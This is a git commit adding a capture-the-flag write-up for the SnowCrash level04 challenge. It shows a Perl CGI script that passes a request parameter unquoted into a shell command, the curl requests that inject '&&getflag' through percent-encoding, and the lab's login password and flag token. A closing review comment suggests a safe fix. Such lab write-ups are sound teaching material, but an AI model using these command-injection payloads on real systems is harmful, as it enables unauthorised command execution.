refactor(maiboyer): adding the maiboyer directory
parent db7f1343c5
commit ab55d4de10
48 changed files with 0 additions and 0 deletions
maiboyer/level04/README.md (Normal file, 96 lines)
@ -0,0 +1,96 @@
# Level 04

## how to login

username: level04

password: qi0maab88jeaj46qoumi7maus

## Goal

run `getflag` as user `flag04`

## Actually doing something

```bash
level04@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl*
-r-x------ 1 level04 level04 675 Apr 3 2012 .profile*
```

Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl

```perl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
$y = $_[0];
print `echo $y 2>&1`;
}
x(param("x"));
```

This reeks of exploit

As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it

The issue is how it returns it...

It forward it to a shell string, and print the result.
This is as secure as having a litteral endpoint that takes a command and return the result.

Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo`
command we can run whatever we want

for example `getflag`

we want this
```perl
print `echo $y 2>&1`
```
to become
```perl
print `echo idk && getflag 2>&1`
```

We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag`

but if we do it dumbly, nothing happens

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
idk
```

Why ?

Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it.

How ?

The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&`

lets replace it to get `idk%26%26getflag` and voila !

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
GetExploited
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```

lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
idk
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```

Look mom, I recycle my stuff !
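Review bot: the last example (`x=idk%26%26/tmp/path/echo`) prints the flag token, but the write-up never shows what `/tmp/path/echo` contains or how it was created, so that step cannot be reproduced from the README as written; add the file's contents (it has to end up invoking `getflag`) next to the curl call, or drop the example. Two smaller points in the same section: the "Why ?" paragraph would be stronger if it named the actual fault, namely that `param("x")` is interpolated unquoted into a backtick command, so the fix is to never hand user input to a shell (here simply `print "$y\n"`; where a subprocess is really needed, the list form of `system` plus taint mode `-T`), and the prose has a few typos to clean up (`litteral`, `separetes`, and `It forward it ... and print` should read `It forwards it ... and prints`).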